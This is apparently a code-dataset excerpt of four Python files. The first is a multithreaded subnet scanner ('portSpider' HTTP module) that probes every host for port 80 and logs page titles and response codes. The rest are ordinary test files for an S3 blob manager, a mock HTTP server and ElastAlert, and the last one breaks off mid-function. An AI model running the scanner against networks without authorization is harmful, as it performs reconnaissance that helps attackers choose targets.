source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
http.py
|
import socket
import requests
from lxml.html import fromstring
import datetime
import sys
import ipaddress
import threading
import os
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[1;94m', '\033[1;91m', '\33[1;97m', '\33[1;93m', '\033[1;35m', '\033[1;32m', '\033[0m'
class ThreadManager(object):
i = 0
def __init__(self, ipList):
self.allIps = ipList
self.size = len(ipList)
def getNextIp(self):
if not (self.i >= self.size - 1):
ip = self.allIps[self.i]
self.i += 1
return ip
return 0
def getID(self):
return self.i + 1
def coreOptions():
options = [["network", "IP range to scan", ""], ["port-timeout", "Timeout (in sec) for port 80.", "0.3"],
["title-timeout", "Timeout (in sec) for title resolve.", "3"], ["threads", "Number of threads to run.", "50"],
["verbose", "Show verbose output.", "true"]]
return options
def createIPList(network):
net4 = ipaddress.ip_network(network)
ipList = []
for x in net4.hosts():
ipList.append(x)
return ipList
def print1(data):
if verbose:
print(data)
def checkServer(address, port):
s = socket.socket()
s.settimeout(float(portTimeout))
try:
s.connect((address, port))
s.close()
return True
except socket.error:
s.close()
return False
except:
s.close()
return "FAIL"
def getHTTP(address, port):
code = None
title = None
try:
r = requests.get("http://" + address, timeout=float(titleTimeout), allow_redirects=True)
except:
return False
try:
code = r.status_code
except:
pass
try:
tree = fromstring(r.content)
title = tree.findtext('.//title')
except:
pass
return [title, code]
def writeToFile(line):
file = open(fileName, "a")
file.write(line)
file.close()
def restart_line():
sys.stdout.write('\r')
sys.stdout.flush()
def statusWidget():
sys.stdout.write(GREEN + "[" + status + "] " + YELLOW + str(threadManager.getID()) + GREEN + " / " + YELLOW + str(
allIPs) + GREEN + " hosts done." + END)
restart_line()
sys.stdout.flush()
def scan(i):
global status
global openPorts
global done
while True:
if stop:
sys.exit()
ip = threadManager.getNextIp()
if ip == 0:
break
status = (threadManager.getID() / allIPs) * 100
status = format(round(status, 2))
status = str(status) + "%"
stringIP = str(ip)
isUp = checkServer(stringIP, port)
if isUp != "FAIL":
if isUp:
openPorts = openPorts + 1
print1(GREEN + "[+] Port 80 is open on '" + stringIP + "'" + END)
http = getHTTP(stringIP, 80)
if not http:
print1(YELLOW + "[!] Failed to get the HTTP response of '" + stringIP + "'" + END)
title = "NO-TITLE"
code = "NO-CODE"
else:
title = str(http[0])
code = str(http[1])
if code is not None:
print1(GREEN + "[+] Response code of '" + stringIP + "': '" + code + "'" + END)
else:
print1(YELLOW + "[!] Failed to get the response code of '" + stringIP + "'" + YELLOW)
code = "NO-CODE"
if title is not None:
title = title.replace("\n", "")
try:
print1(GREEN + "[+] Title of '" + stringIP + "': '" + title + "'" + END)
except:
print1(YELLOW + "[!] Failed to print title of '" + stringIP + "'" + END)
title = "NO-TITLE"
else:
print1(YELLOW + "[!] Failed to get title of '" + stringIP + "'" + YELLOW)
title = "NO-TITLE"
logLine = stringIP + " - " + "80 OPEN" + " - " + code + " - " + title + "\n"
logLines.append(logLine)
elif not isUp:
print1(RED + "[-] Port 80 is closed on '" + stringIP + "'" + END)
else:
print1(RED + "[!] Failed connecting to '" + stringIP + "'" + END)
done = done + 1
def core(moduleOptions):
print(
"\n" + GREEN + "HTTP module by @xdavidhu. Scanning subnet '" + YELLOW + moduleOptions[0][2] + GREEN + "'...\n")
global status
global fileName
global allIPs
global portTimeout
global titleTimeout
global ips
global threadCount
global done
global verbose
global stop
global port
global openPorts
global logLines
global threadManager
logLines = []
stop = False
done = 0
portTimeout = moduleOptions[1][2]
titleTimeout = moduleOptions[2][2]
network = moduleOptions[0][2]
threadCount = int(moduleOptions[3][2])
verbose = moduleOptions[4][2]
if verbose == "true":
verbose = True
else:
verbose = False
try:
ipList = createIPList(network)
except:
print(RED + "[!] Invalid subnet. Exiting...\n")
return
allIPs = len(ipList)
threadManager = ThreadManager(ipList)
i = datetime.datetime.now()
i = str(i).replace(" ", "_")
i = str(i).replace(":", "-")
if not os.path.exists("logs"):
os.makedirs("logs")
fileName = "logs/log-http-portSpider-" + i + ".log"
file = open(fileName, 'w')
file.write("subnet: " + network + "\n")
file.close()
port = 80
openPorts = 0
threads = []
for i in range(threadCount):
i -= 1
t = threading.Thread(target=scan, args=(i,))
t.daemon = True
threads.append(t)
t.start()
try:
while True:
if done == threadCount and threadManager.getID() == allIPs:
break
statusWidget()
except KeyboardInterrupt:
stop = True
verbose = False
print("\n" + RED + "[I] Stopping..." + END)
stop = True
verbose = False
for logLine in logLines:
try:
writeToFile(logLine)
except:
writeToFile("WRITING-ERROR")
print("\n\n" + GREEN + "[I] HTTP module done. Results saved to '" + YELLOW + fileName + GREEN + "'.\n")
|
test_s3_blob_manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os
import threading
import unittest
from unittest import mock
from ai_flow.plugin_interface.blob_manager_interface import BlobConfig, BlobManagerFactory
from ai_flow.util.path_util import get_file_dir
from ai_flow_plugins.blob_manager_plugins.s3_blob_manager import S3BlobManager
class TestS3BlobManager(unittest.TestCase):
@unittest.skipUnless((os.environ.get('blob_server.service_name') is not None
and os.environ.get('blob_server.region_name') is not None
and os.environ.get('blob_server.api_version') is not None
and os.environ.get('blob_server.use_ssl') is not None
and os.environ.get('blob_server.verify') is not None
and os.environ.get('blob_server.endpoint_url') is not None
and os.environ.get('blob_server.access_key_id') is not None
and os.environ.get('blob_server.secret_access_key') is not None
and os.environ.get('blob_server.bucket_name') is not None), 'need set s3')
def test_project_upload_download_s3(self):
project_path = get_file_dir(__file__)
config = {
'blob_manager_class': 'ai_flow_plugins.blob_manager_plugins.s3_blob_manager.S3BlobManager',
'blob_manager_config': {
'service_name': os.environ.get('blob_server.service_name'),
'region_name': os.environ.get('blob_server.region_name'),
'api_version': os.environ.get('blob_server.api_version'),
'use_ssl': os.environ.get('blob_server.use_ssl'),
'verify': os.environ.get('blob_server.verify'),
'endpoint_url': os.environ.get('blob_server.endpoint_url'),
'access_key_id': os.environ.get('blob_server.access_key_id'),
'secret_access_key': os.environ.get('blob_server.secret_access_key'),
'bucket_name': os.environ.get('blob_server.bucket_name'),
'local_repository': '/tmp'
}
}
blob_config = BlobConfig(config)
blob_manager = BlobManagerFactory.create_blob_manager(
blob_config.blob_manager_class(), blob_config.blob_manager_config())
uploaded_path = blob_manager.upload_project('1', project_path)
downloaded_path = blob_manager.download_project('1', uploaded_path)
self.assertEqual('/tmp/workflow_1_project/project', downloaded_path)
def test_concurrent_download_s3_file(self):
project_zip = '/tmp/workflow_1_project.zip'
if os.path.exists(project_zip):
os.remove(project_zip)
config = {'service_name': 's3'}
s3_blob_manager = S3BlobManager(config)
zip_file_path = None
call_count = 0
def mock_get_s3_object(local_path, object_key):
nonlocal zip_file_path, call_count
call_count += 1
zip_file_path = local_path
with open(local_path, 'w') as f:
pass
s3_blob_manager._get_s3_object = mock_get_s3_object
with mock.patch(
'ai_flow_plugins.blob_manager_plugins.s3_blob_manager.extract_project_zip_file'):
def download_loop():
for i in range(1000):
s3_blob_manager.download_project('1', 'dummy_path', '/tmp')
try:
t1 = threading.Thread(target=download_loop)
t1.start()
download_loop()
t1.join()
self.assertEqual(1, call_count)
finally:
if zip_file_path:
os.remove(zip_file_path)
def test__get_s3_object_retry(self):
config = {'service_name': 's3'}
s3_blob_manager = S3BlobManager(config)
with mock.patch.object(s3_blob_manager, 's3_client') as mock_client:
mock_client.download_fileobj.side_effect = [RuntimeError("boom"), RuntimeError("boom"),
RuntimeError("boom")]
with self.assertRaises(RuntimeError):
s3_blob_manager._get_s3_object('dummy_dest', 'key', retry_sleep_sec=0.1)
self.assertEqual(3, mock_client.download_fileobj.call_count)
if __name__ == '__main__':
unittest.main()
|
testsuite_utils.py
|
"""
testsuite_utils.py
Methods used throughout the test suite for testing.
"""
import socket
from threading import Thread
try: # python 2
from BaseHTTPServer import HTTPServer
except ImportError: # python 3
from http.server import HTTPServer
def get_free_port():
""" Find a free port
Return a port available for connecting on localhost.
"""
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(("localhost", 0))
addr, port = s.getsockname()
s.close()
return port
class MockServer(object):
""" Mock server
Run an HTTP server as a daemon in a thread.
"""
@classmethod
def serve(cls, http_server):
""" Set up mock server
INPUTS
-------
http_server: BaseHTTPRequestHandler
HTTP server with request handlers specified
"""
# Find a port to listen to connect.
cls.mock_server_port = get_free_port()
# Instantiate server.
cls.mock_server = \
HTTPServer(("localhost", cls.mock_server_port), http_server)
cls.mock_server_thread = Thread(target=cls.mock_server.serve_forever)
cls.mock_server_thread.setDaemon(True)
cls.mock_server_thread.start()
|
base_test.py
|
# -*- coding: utf-8 -*-
import copy
import datetime
import json
import threading
import elasticsearch
import mock
import pytest
from elasticsearch.exceptions import ConnectionError
from elasticsearch.exceptions import ElasticsearchException
from elastalert.enhancements import BaseEnhancement
from elastalert.enhancements import DropMatchException
from elastalert.kibana import dashboard_temp
from elastalert.util import dt_to_ts
from elastalert.util import dt_to_unix
from elastalert.util import dt_to_unixms
from elastalert.util import EAException
from elastalert.util import ts_now
from elastalert.util import ts_to_dt
from elastalert.util import unix_to_dt
START_TIMESTAMP = '2014-09-26T12:34:45Z'
END_TIMESTAMP = '2014-09-27T12:34:45Z'
START = ts_to_dt(START_TIMESTAMP)
END = ts_to_dt(END_TIMESTAMP)
def _set_hits(ea_inst, hits):
res = {'hits': {'total': len(hits), 'hits': hits}}
ea_inst.client_es.return_value = res
def generate_hits(timestamps, **kwargs):
hits = []
for i, ts in enumerate(timestamps):
data = {'_id': 'id{}'.format(i),
'_source': {'@timestamp': ts},
'_type': 'logs',
'_index': 'idx'}
for key, item in kwargs.items():
data['_source'][key] = item
# emulate process_hits(), add metadata to _source
for field in ['_id', '_type', '_index']:
data['_source'][field] = data[field]
hits.append(data)
return {'hits': {'total': len(hits), 'hits': hits}}
def assert_alerts(ea_inst, calls):
""" Takes a list of lists of timestamps. Asserts that an alert was called for each list, containing those timestamps. """
assert ea_inst.rules[0]['alert'][0].alert.call_count == len(calls)
for call_num, call_args in enumerate(ea_inst.rules[0]['alert'][0].alert.call_args_list):
assert not any([match['@timestamp'] not in calls[call_num] for match in call_args[0][0]])
assert len(call_args[0][0]) == len(calls[call_num])
def test_starttime(ea):
invalid = ['2014-13-13',
'2014-11-24T30:00:00',
'Not A Timestamp']
for ts in invalid:
with pytest.raises((TypeError, ValueError)):
ts_to_dt(ts)
def test_init_rule(ea):
# Simulate state of a rule just loaded from a file
ea.rules[0]['minimum_starttime'] = datetime.datetime.now()
new_rule = copy.copy(ea.rules[0])
list(map(new_rule.pop, ['agg_matches', 'current_aggregate_id', 'processed_hits', 'minimum_starttime']))
# Properties are copied from ea.rules[0]
ea.rules[0]['starttime'] = '2014-01-02T00:11:22'
ea.rules[0]['processed_hits'] = ['abcdefg']
new_rule = ea.init_rule(new_rule, False)
for prop in ['starttime', 'agg_matches', 'current_aggregate_id', 'processed_hits', 'minimum_starttime', 'run_every']:
assert new_rule[prop] == ea.rules[0][prop]
# Properties are fresh
new_rule = ea.init_rule(new_rule, True)
new_rule.pop('starttime')
assert 'starttime' not in new_rule
assert new_rule['processed_hits'] == {}
# Assert run_every is unique
new_rule['run_every'] = datetime.timedelta(seconds=17)
new_rule = ea.init_rule(new_rule, True)
assert new_rule['run_every'] == datetime.timedelta(seconds=17)
def test_query(ea):
ea.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
ea.thread_data.current_es.search.assert_called_with(body={
'query': {'filtered': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': END_TIMESTAMP, 'gt': START_TIMESTAMP}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'],
ignore_unavailable=True,
size=ea.rules[0]['max_query_size'], scroll=ea.conf['scroll_keepalive'])
def test_query_sixsix(ea_sixsix):
ea_sixsix.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea_sixsix.run_query(ea_sixsix.rules[0], START, END)
ea_sixsix.thread_data.current_es.search.assert_called_with(body={
'query': {'bool': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': END_TIMESTAMP, 'gt': START_TIMESTAMP}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'],
ignore_unavailable=True,
size=ea_sixsix.rules[0]['max_query_size'], scroll=ea_sixsix.conf['scroll_keepalive'])
def test_query_with_fields(ea):
ea.rules[0]['_source_enabled'] = False
ea.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
ea.thread_data.current_es.search.assert_called_with(body={
'query': {'filtered': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': END_TIMESTAMP, 'gt': START_TIMESTAMP}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}], 'fields': ['@timestamp']}, index='idx', ignore_unavailable=True,
size=ea.rules[0]['max_query_size'], scroll=ea.conf['scroll_keepalive'])
def test_query_sixsix_with_fields(ea_sixsix):
ea_sixsix.rules[0]['_source_enabled'] = False
ea_sixsix.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea_sixsix.run_query(ea_sixsix.rules[0], START, END)
ea_sixsix.thread_data.current_es.search.assert_called_with(body={
'query': {'bool': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': END_TIMESTAMP, 'gt': START_TIMESTAMP}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}], 'stored_fields': ['@timestamp']}, index='idx',
ignore_unavailable=True,
size=ea_sixsix.rules[0]['max_query_size'], scroll=ea_sixsix.conf['scroll_keepalive'])
def test_query_with_unix(ea):
ea.rules[0]['timestamp_type'] = 'unix'
ea.rules[0]['dt_to_ts'] = dt_to_unix
ea.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
start_unix = dt_to_unix(START)
end_unix = dt_to_unix(END)
ea.thread_data.current_es.search.assert_called_with(
body={'query': {'filtered': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': end_unix, 'gt': start_unix}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'],
ignore_unavailable=True,
size=ea.rules[0]['max_query_size'], scroll=ea.conf['scroll_keepalive'])
def test_query_sixsix_with_unix(ea_sixsix):
ea_sixsix.rules[0]['timestamp_type'] = 'unix'
ea_sixsix.rules[0]['dt_to_ts'] = dt_to_unix
ea_sixsix.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea_sixsix.run_query(ea_sixsix.rules[0], START, END)
start_unix = dt_to_unix(START)
end_unix = dt_to_unix(END)
ea_sixsix.thread_data.current_es.search.assert_called_with(
body={'query': {'bool': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': end_unix, 'gt': start_unix}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'],
ignore_unavailable=True,
size=ea_sixsix.rules[0]['max_query_size'], scroll=ea_sixsix.conf['scroll_keepalive'])
def test_query_with_unixms(ea):
ea.rules[0]['timestamp_type'] = 'unixms'
ea.rules[0]['dt_to_ts'] = dt_to_unixms
ea.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
start_unix = dt_to_unixms(START)
end_unix = dt_to_unixms(END)
ea.thread_data.current_es.search.assert_called_with(
body={'query': {'filtered': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': end_unix, 'gt': start_unix}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'],
ignore_unavailable=True,
size=ea.rules[0]['max_query_size'], scroll=ea.conf['scroll_keepalive'])
def test_query_sixsix_with_unixms(ea_sixsix):
ea_sixsix.rules[0]['timestamp_type'] = 'unixms'
ea_sixsix.rules[0]['dt_to_ts'] = dt_to_unixms
ea_sixsix.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea_sixsix.run_query(ea_sixsix.rules[0], START, END)
start_unix = dt_to_unixms(START)
end_unix = dt_to_unixms(END)
ea_sixsix.thread_data.current_es.search.assert_called_with(
body={'query': {'bool': {
'filter': {'bool': {'must': [{'range': {'@timestamp': {'lte': end_unix, 'gt': start_unix}}}]}}}},
'sort': [{'@timestamp': {'order': 'asc'}}]}, index='idx', _source_include=['@timestamp'],
ignore_unavailable=True,
size=ea_sixsix.rules[0]['max_query_size'], scroll=ea_sixsix.conf['scroll_keepalive'])
def test_no_hits(ea):
ea.thread_data.current_es.search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
assert ea.rules[0]['type'].add_data.call_count == 0
def test_no_terms_hits(ea):
ea.rules[0]['use_terms_query'] = True
ea.rules[0]['query_key'] = 'QWERTY'
ea.rules[0]['doc_type'] = 'uiop'
ea.thread_data.current_es.deprecated_search.return_value = {'hits': {'total': 0, 'hits': []}}
ea.run_query(ea.rules[0], START, END)
assert ea.rules[0]['type'].add_terms_data.call_count == 0
def test_some_hits(ea):
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP])
hits_dt = generate_hits([START, END])
ea.thread_data.current_es.search.return_value = hits
ea.run_query(ea.rules[0], START, END)
assert ea.rules[0]['type'].add_data.call_count == 1
ea.rules[0]['type'].add_data.assert_called_with([x['_source'] for x in hits_dt['hits']['hits']])
def test_some_hits_unix(ea):
ea.rules[0]['timestamp_type'] = 'unix'
ea.rules[0]['dt_to_ts'] = dt_to_unix
ea.rules[0]['ts_to_dt'] = unix_to_dt
hits = generate_hits([dt_to_unix(START), dt_to_unix(END)])
hits_dt = generate_hits([START, END])
ea.thread_data.current_es.search.return_value = copy.deepcopy(hits)
ea.run_query(ea.rules[0], START, END)
assert ea.rules[0]['type'].add_data.call_count == 1
ea.rules[0]['type'].add_data.assert_called_with([x['_source'] for x in hits_dt['hits']['hits']])
def _duplicate_hits_generator(timestamps, **kwargs):
"""Generator repeatedly returns identical hits dictionaries
"""
while True:
yield generate_hits(timestamps, **kwargs)
def test_duplicate_timestamps(ea):
ea.thread_data.current_es.search.side_effect = _duplicate_hits_generator([START_TIMESTAMP] * 3, blah='duplicate')
ea.run_query(ea.rules[0], START, ts_to_dt('2014-01-01T00:00:00Z'))
assert len(ea.rules[0]['type'].add_data.call_args_list[0][0][0]) == 3
assert ea.rules[0]['type'].add_data.call_count == 1
# Run the query again, duplicates will be removed and not added
ea.run_query(ea.rules[0], ts_to_dt('2014-01-01T00:00:00Z'), END)
assert ea.rules[0]['type'].add_data.call_count == 1
def test_match(ea):
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP])
ea.thread_data.current_es.search.return_value = hits
ea.rules[0]['type'].matches = [{'@timestamp': END}]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
ea.rules[0]['alert'][0].alert.called_with({'@timestamp': END_TIMESTAMP})
assert ea.rules[0]['alert'][0].alert.call_count == 1
def test_run_rule_calls_garbage_collect(ea):
start_time = '2014-09-26T00:00:00Z'
end_time = '2014-09-26T12:00:00Z'
ea.buffer_time = datetime.timedelta(hours=1)
ea.run_every = datetime.timedelta(hours=1)
with mock.patch.object(ea.rules[0]['type'], 'garbage_collect') as mock_gc, \
mock.patch.object(ea, 'run_query'):
ea.run_rule(ea.rules[0], ts_to_dt(end_time), ts_to_dt(start_time))
# Running ElastAlert every hour for 12 hours, we should see self.garbage_collect called 12 times.
assert mock_gc.call_count == 12
# The calls should be spaced 1 hour apart
expected_calls = [ts_to_dt(start_time) + datetime.timedelta(hours=i) for i in range(1, 13)]
for e in expected_calls:
mock_gc.assert_any_call(e)
def run_rule_query_exception(ea, mock_es):
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es_init:
mock_es_init.return_value = mock_es
ea.run_rule(ea.rules[0], END, START)
# Assert neither add_data nor garbage_collect were called
# and that starttime did not change
assert ea.rules[0].get('starttime') == START
assert ea.rules[0]['type'].add_data.call_count == 0
assert ea.rules[0]['type'].garbage_collect.call_count == 0
assert ea.rules[0]['type'].add_count_data.call_count == 0
def test_query_exception(ea):
mock_es = mock.Mock()
mock_es.search.side_effect = ElasticsearchException
run_rule_query_exception(ea, mock_es)
def test_query_exception_count_query(ea):
ea.rules[0]['use_count_query'] = True
ea.rules[0]['doc_type'] = 'blahblahblahblah'
mock_es = mock.Mock()
mock_es.count.side_effect = ElasticsearchException
run_rule_query_exception(ea, mock_es)
def test_match_with_module(ea):
mod = BaseEnhancement(ea.rules[0])
mod.process = mock.Mock()
ea.rules[0]['match_enhancements'] = [mod]
test_match(ea)
mod.process.assert_called_with({'@timestamp': END, 'num_hits': 0, 'num_matches': 1})
def test_match_with_module_from_pending(ea):
mod = BaseEnhancement(ea.rules[0])
mod.process = mock.Mock()
ea.rules[0]['match_enhancements'] = [mod]
ea.rules[0].pop('aggregation')
pending_alert = {'match_body': {'foo': 'bar'}, 'rule_name': ea.rules[0]['name'],
'alert_time': START_TIMESTAMP, '@timestamp': START_TIMESTAMP}
# First call, return the pending alert, second, no associated aggregated alerts
ea.writeback_es.deprecated_search.side_effect = [{'hits': {'hits': [{'_id': 'ABCD', '_index': 'wb', '_source': pending_alert}]}},
{'hits': {'hits': []}}]
ea.send_pending_alerts()
assert mod.process.call_count == 0
# If aggregation is set, enhancement IS called
pending_alert = {'match_body': {'foo': 'bar'}, 'rule_name': ea.rules[0]['name'],
'alert_time': START_TIMESTAMP, '@timestamp': START_TIMESTAMP}
ea.writeback_es.deprecated_search.side_effect = [{'hits': {'hits': [{'_id': 'ABCD', '_index': 'wb', '_source': pending_alert}]}},
{'hits': {'hits': []}}]
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.send_pending_alerts()
assert mod.process.call_count == 1
def test_match_with_module_with_agg(ea):
mod = BaseEnhancement(ea.rules[0])
mod.process = mock.Mock()
ea.rules[0]['match_enhancements'] = [mod]
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=15)
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP])
ea.thread_data.current_es.search.return_value = hits
ea.rules[0]['type'].matches = [{'@timestamp': END}]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
ea.run_rule(ea.rules[0], END, START)
assert mod.process.call_count == 0
def test_match_with_enhancements_first(ea):
mod = BaseEnhancement(ea.rules[0])
mod.process = mock.Mock()
ea.rules[0]['match_enhancements'] = [mod]
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=15)
ea.rules[0]['run_enhancements_first'] = True
hits = generate_hits([START_TIMESTAMP, END_TIMESTAMP])
ea.thread_data.current_es.search.return_value = hits
ea.rules[0]['type'].matches = [{'@timestamp': END}]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch.object(ea, 'add_aggregated_alert') as add_alert:
ea.run_rule(ea.rules[0], END, START)
mod.process.assert_called_with({'@timestamp': END, 'num_hits': 0, 'num_matches': 1})
assert add_alert.call_count == 1
# Assert that dropmatchexception behaves properly
mod.process = mock.MagicMock(side_effect=DropMatchException)
ea.rules[0]['type'].matches = [{'@timestamp': END}]
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch.object(ea, 'add_aggregated_alert') as add_alert:
ea.run_rule(ea.rules[0], END, START)
mod.process.assert_called_with({'@timestamp': END, 'num_hits': 0, 'num_matches': 1})
assert add_alert.call_count == 0
def test_agg_matchtime(ea):
ea.max_aggregation = 1337
hits_timestamps = ['2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:47:45']
alerttime1 = dt_to_ts(ts_to_dt(hits_timestamps[0]) + datetime.timedelta(minutes=10))
hits = generate_hits(hits_timestamps)
ea.thread_data.current_es.search.return_value = hits
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es:
# Aggregate first two, query over full range
mock_es.return_value = ea.thread_data.current_es
ea.rules[0]['aggregate_by_match_time'] = True
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.rules[0]['type'].matches = [{'@timestamp': h} for h in hits_timestamps]
ea.run_rule(ea.rules[0], END, START)
# Assert that the three matches were added to Elasticsearch
call1 = ea.writeback_es.index.call_args_list[0][1]['body']
call2 = ea.writeback_es.index.call_args_list[1][1]['body']
call3 = ea.writeback_es.index.call_args_list[2][1]['body']
assert call1['match_body']['@timestamp'] == '2014-09-26T12:34:45'
assert not call1['alert_sent']
assert 'aggregate_id' not in call1
assert call1['alert_time'] == alerttime1
assert call2['match_body']['@timestamp'] == '2014-09-26T12:40:45'
assert not call2['alert_sent']
assert call2['aggregate_id'] == 'ABCD'
assert call3['match_body']['@timestamp'] == '2014-09-26T12:47:45'
assert not call3['alert_sent']
assert 'aggregate_id' not in call3
# First call - Find all pending alerts (only entries without agg_id)
# Second call - Find matches with agg_id == 'ABCD'
# Third call - Find matches with agg_id == 'CDEF'
ea.writeback_es.deprecated_search.side_effect = [{'hits': {'hits': [{'_id': 'ABCD', '_index': 'wb', '_source': call1},
{'_id': 'CDEF', '_index': 'wb', '_source': call3}]}},
{'hits': {'hits': [{'_id': 'BCDE', '_index': 'wb', '_source': call2}]}},
{'hits': {'total': 0, 'hits': []}}]
with mock.patch('elastalert.elastalert.elasticsearch_client') as mock_es:
ea.send_pending_alerts()
# Assert that current_es was refreshed from the aggregate rules
assert mock_es.called_with(host='', port='')
assert mock_es.call_count == 2
assert_alerts(ea, [hits_timestamps[:2], hits_timestamps[2:]])
call1 = ea.writeback_es.deprecated_search.call_args_list[7][1]['body']
call2 = ea.writeback_es.deprecated_search.call_args_list[8][1]['body']
call3 = ea.writeback_es.deprecated_search.call_args_list[9][1]['body']
call4 = ea.writeback_es.deprecated_search.call_args_list[10][1]['body']
assert 'alert_time' in call2['filter']['range']
assert call3['query']['query_string']['query'] == 'aggregate_id:ABCD'
assert call4['query']['query_string']['query'] == 'aggregate_id:CDEF'
assert ea.writeback_es.deprecated_search.call_args_list[9][1]['size'] == 1337
def test_agg_not_matchtime(ea):
ea.max_aggregation = 1337
hits_timestamps = ['2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:47:45']
match_time = ts_to_dt('2014-09-26T12:55:00Z')
hits = generate_hits(hits_timestamps)
ea.thread_data.current_es.search.return_value = hits
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch('elastalert.elastalert.ts_now', return_value=match_time):
ea.rules[0]['aggregation'] = datetime.timedelta(minutes=10)
ea.rules[0]['type'].matches = [{'@timestamp': h} for h in hits_timestamps]
ea.run_rule(ea.rules[0], END, START)
# Assert that the three matches were added to Elasticsearch
call1 = ea.writeback_es.index.call_args_list[0][1]['body']
call2 = ea.writeback_es.index.call_args_list[1][1]['body']
call3 = ea.writeback_es.index.call_args_list[2][1]['body']
assert call1['match_body']['@timestamp'] == '2014-09-26T12:34:45'
assert not call1['alert_sent']
assert 'aggregate_id' not in call1
assert call1['alert_time'] == dt_to_ts(match_time + datetime.timedelta(minutes=10))
assert call2['match_body']['@timestamp'] == '2014-09-26T12:40:45'
assert not call2['alert_sent']
assert call2['aggregate_id'] == 'ABCD'
assert call3['match_body']['@timestamp'] == '2014-09-26T12:47:45'
assert not call3['alert_sent']
assert call3['aggregate_id'] == 'ABCD'
def test_agg_cron(ea):
ea.max_aggregation = 1337
hits_timestamps = ['2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:47:45']
hits = generate_hits(hits_timestamps)
ea.thread_data.current_es.search.return_value = hits
alerttime1 = dt_to_ts(ts_to_dt('2014-09-26T12:46:00'))
alerttime2 = dt_to_ts(ts_to_dt('2014-09-26T13:04:00'))
with mock.patch('elastalert.elastalert.elasticsearch_client'):
with mock.patch('elastalert.elastalert.croniter.get_next') as mock_ts:
# Aggregate first two, query over full range
mock_ts.side_effect = [dt_to_unix(ts_to_dt('2014-09-26T12:46:00')),
dt_to_unix(ts_to_dt('2014-09-26T13:04:00'))]
ea.rules[0]['aggregation'] = {'schedule': '*/5 * * * *'}
ea.rules[0]['type'].matches = [{'@timestamp': h} for h in hits_timestamps]
ea.run_rule(ea.rules[0], END, START)
# Assert that the three matches were added to Elasticsearch
call1 = ea.writeback_es.index.call_args_list[0][1]['body']
call2 = ea.writeback_es.index.call_args_list[1][1]['body']
call3 = ea.writeback_es.index.call_args_list[2][1]['body']
assert call1['match_body']['@timestamp'] == '2014-09-26T12:34:45'
assert not call1['alert_sent']
assert 'aggregate_id' not in call1
assert call1['alert_time'] == alerttime1
assert call2['match_body']['@timestamp'] == '2014-09-26T12:40:45'
assert not call2['alert_sent']
assert call2['aggregate_id'] == 'ABCD'
assert call3['match_body']['@timestamp'] == '2014-09-26T12:47:45'
assert call3['alert_time'] == alerttime2
assert not call3['alert_sent']
assert 'aggregate_id' not in call3
def test_agg_no_writeback_connectivity(ea):
""" Tests that if writeback_es throws an exception, the matches will be added to 'agg_matches' and when
run again, that they will be passed again to add_aggregated_alert """
hit1, hit2, hit3 = '2014-09-26T12:34:45', '2014-09-26T12:40:45', '2014-09-26T12:47:45'
hits = generate_hits([hit1, hit2, hit3])
ea.thread_data.current_es.search.return_value = hits
